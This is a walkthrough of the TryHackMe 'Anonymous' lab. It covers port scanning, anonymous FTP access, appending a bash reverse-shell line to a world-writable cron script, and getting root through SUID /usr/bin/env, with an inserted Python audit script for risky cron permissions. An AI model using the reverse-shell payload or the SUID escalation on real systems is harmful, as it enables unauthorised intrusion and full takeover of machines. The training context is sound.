THM Writeup – Anonymous

Anonymous

Not the hacking group

Room: Anonymous

Difficulty: Medium

Operating System: Linux

Author: Nameless0ne

Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.

Add IP address to your hosts file:

echo '10.10.98.41    anonymous.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv anonymous.thm

PORT    STATE SERVICE      REASON
21/tcp  open  ftp          syn-ack ttl 64
22/tcp  open  ssh          syn-ack ttl 64
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 21,22,139,445 anonymous.thm

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.251.141
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (EdDSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

It’s time to answer a few questions:

Enumerate the machine. How many ports are open?

What service is running on port 21?

What service is running on ports 139 and 445?

Enumerate SMB shares:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse anonymous.thm

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.98.41\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (anonymous server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.98.41\pics: 
|     Type: STYPE_DISKTREE
|     Comment: My SMB Share Directory for Pics
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\namelessone\pics
|     Anonymous access: READ
|     Current user access: READ
|   \\10.10.98.41\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
| smb-enum-users: 
|   ANONYMOUS\namelessone (RID: 1003)
|     Full name:   namelessone
|     Description: 
|_    Flags:       Normal user account

Now you can answer another question:

There’s a share on the user’s computer. What’s it called?

OK, so we have FTP, SSH and SMB open. FTP allows anonymous login, so let’s check it out first.

Connect to FTP:

root@ip-10-10-251-141:~# ftp anonymous.thm
Connected to anonymous.thm.
220 NamelessOne's FTP Server!
Name (anonymous.thm:root): anonymous 
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Look around:

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1333 Mar 09 07:14 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

Download all the files:

ftp> prompt off
Interactive mode off.
ftp> mget *

File to_do.txt:

[image: contents of to_do.txt]

File clean.sh:

[image: contents of clean.sh]

File removed_files.log:

[image: contents of removed_files.log]

OK, so there is a cleanup script that writes a log file and probably runs from cron. Luckily for us, clean.sh is writable by others (-rwxr-xrwx) inside a world-writable directory, so if cron really is what executes it, we can append a payload and get a reverse shell.
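From the defender’s side, the condition abused here is easy to audit. The following is an added example, not part of the original writeup: it parses an `ls -l` style listing of the scripts directory (the one seen over FTP above) together with a constructed system crontab, and reports every scheduled script whose mode grants write access to group or others. The crontab line and its path are hypothetical, since the room’s real crontab is not shown.

```python
# Added audit example (not from the original writeup): flag cron jobs whose
# script is writable by group or others, the misconfiguration that let
# clean.sh be overwritten over anonymous FTP. All inputs are constructed.

LS_OUTPUT = """\
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1333 Mar 09 07:14 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
"""

# Hypothetical crontab; the room's real script path is not shown.
CRONTAB = """\
# m h dom mon dow user command
* * * * * namelessone /var/ftp/scripts/clean.sh
0 3 * * * root /usr/local/sbin/backup.sh
"""

def parse_listing(text):
    """Map file name -> 10-char mode string from `ls -l` style lines."""
    modes = {}
    for line in text.splitlines():
        f = line.split(None, 8)  # mode links owner group size mon day yr name
        if len(f) == 9 and len(f[0]) == 10:
            modes[f[8]] = f[0]
    return modes

def writable_by_others(mode):
    """True if the group (index 5) or other (index 8) write bit is set."""
    return mode[5] == "w" or mode[8] == "w"

def cron_commands(text):
    """Yield (user, command) from system-crontab lines, skipping comments."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        f = line.split(None, 6)  # m h dom mon dow user command
        if len(f) == 7:
            yield f[5], f[6]

def find_risky_jobs(ls_text, crontab_text):
    """Return [(user, command, mode)] for scheduled scripts others can write.
    Matching is by basename, since the FTP listing carries no directory."""
    modes = parse_listing(ls_text)
    risky = []
    for user, cmd in cron_commands(crontab_text):
        name = cmd.split()[0].rsplit("/", 1)[-1]
        mode = modes.get(name)
        if mode and writable_by_others(mode):
            risky.append((user, cmd, mode))
    return risky
```

On a real host the same check belongs in a periodic job that reads the actual /etc/crontab, /etc/cron.d and user crontabs and stats the referenced scripts directly instead of parsing `ls` output.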

Modify clean.sh:

echo 'bash -i >& /dev/tcp/10.10.251.141/4242 0>&1' >> clean.sh

Set up a listener on the attacking machine:

nc -lnvp 4242

Now go back to the terminal where you are connected to FTP and upload the modified version of clean.sh:

ftp> put clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
358 bytes sent in 0.00 secs (17.0708 MB/s)

Wait for the cron job to run…

And we have a reverse connection:

[image: reverse shell received on the listener]

Stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 24 columns 80
export TERM=xterm-256color

Now look around – find the user flag and read it:

namelessone@anonymous:~$ pwd
/home/namelessone
namelessone@anonymous:~$ ls -lA
total 52
lrwxrwxrwx 1 root        root           9 May 11  2020 .bash_history -> /dev/null
-rw-r--r-- 1 namelessone namelessone  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 namelessone namelessone 3771 Apr  4  2018 .bashrc
drwx------ 2 namelessone namelessone 4096 May 11  2020 .cache
drwx------ 3 namelessone namelessone 4096 May 11  2020 .gnupg
-rw------- 1 namelessone namelessone   36 May 12  2020 .lesshst
drwxrwxr-x 3 namelessone namelessone 4096 May 12  2020 .local
drwxr-xr-x 2 namelessone namelessone 4096 May 17  2020 pics
-rw-r--r-- 1 namelessone namelessone  807 Apr  4  2018 .profile
-rw-rw-r-- 1 namelessone namelessone   66 May 12  2020 .selected_editor
-rw-r--r-- 1 namelessone namelessone    0 May 12  2020 .sudo_as_admin_successful
-rw-r--r-- 1 namelessone namelessone   33 May 11  2020 user.txt
-rw------- 1 namelessone namelessone 7994 May 12  2020 .viminfo
-rw-rw-r-- 1 namelessone namelessone  215 May 13  2020 .wget-hsts
namelessone@anonymous:~$ cat user.txt 
[REDACTED]

Now we need to escalate our privileges to root – do a basic enumeration:

sudo -l
cat /etc/crontab
getcap -r / 2>/dev/null
find / -type f -perm -4000 2>/dev/null

The SUID bit set on /usr/bin/env is interesting – check GTFOBins for the way to abuse it:

namelessone@anonymous:~$ /usr/bin/env /bin/sh -p
# id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

As we can see, our effective user id (euid) is now root.

Read the root flag:

# cat /root/root.txt
[REDACTED]
